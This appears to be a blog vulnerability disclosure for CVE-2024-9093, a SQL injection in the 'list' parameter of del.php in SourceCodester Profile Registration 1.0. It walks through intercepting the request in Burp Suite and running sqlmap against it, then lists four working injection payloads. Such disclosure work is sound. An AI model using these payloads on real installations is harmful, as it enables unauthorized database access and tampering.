👨‍💻👾👨‍💻👾👨‍💻👾

Search

SearchSearch

CVE-2024-9093

Jan 07, 20252 min read

SQL Injection vulnerability was discovered from Sourcecodester Profile Registration without Reload/Refresh 1.0 (del.php)

CVE-2024-9093

A vulnerability classified as critical has been found in SourceCodester Profile Registration without Reload Refresh 1.0. This affects an unknown function of the file del.php of the component GET Parameter Handler. The manipulation of the argument list with an unknown input leads to a sql injection vulnerability. CWE is classifying the issue as CWE-89. The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. This is going to have an impact on confidentiality, integrity, and availability.

Affected Project: Profile Registration without Reload/Refresh 1.0

Official Website: https://www.sourcecodester.com/php/17587/profile-registration-without-reloadrefresh-using-ajax-php-and-mysql-source-code.html

Version: 1.0

Related Code file: del.php

Injection parameter: GET parameter ‘list’ is vulnerable.

Demonstration

Below is Profile Registration without Reload/Refresh 1.0:

index

Below is admin page. We can see there is a delete feature to it:

admin-php

Let’s try deleting one of the entry:

Screenshot from 2024-09-22 15-17-22

We will intercept the delete (del.php) traffic using Burp Suite:

Screenshot from 2024-09-22 15-18-26

After saving the intercepted request as txt file, we will run sqlmap against it: sqlmap -r del.req --batch

image

sqlmap identifies GET parameter ‘list’ as vulnerable. Below is the payload used:

Parameter: list (GET) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: list=1’ AND EXTRACTVALUE(6463,CASE WHEN (6463=6463) THEN 6463 ELSE 0x3A END)— jUPW

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: list=1' AND GTID_SUBSET(CONCAT(0x7176786271,(SELECT (ELT(3483=3483,1))),0x71627a6271),3483)-- xwxz

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: list=1';SELECT SLEEP(5)#

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: list=1' AND (SELECT 7323 FROM (SELECT(SLEEP(5)))ELsa)-- jKqa

Graph View

Backlinks

  • No backlinks found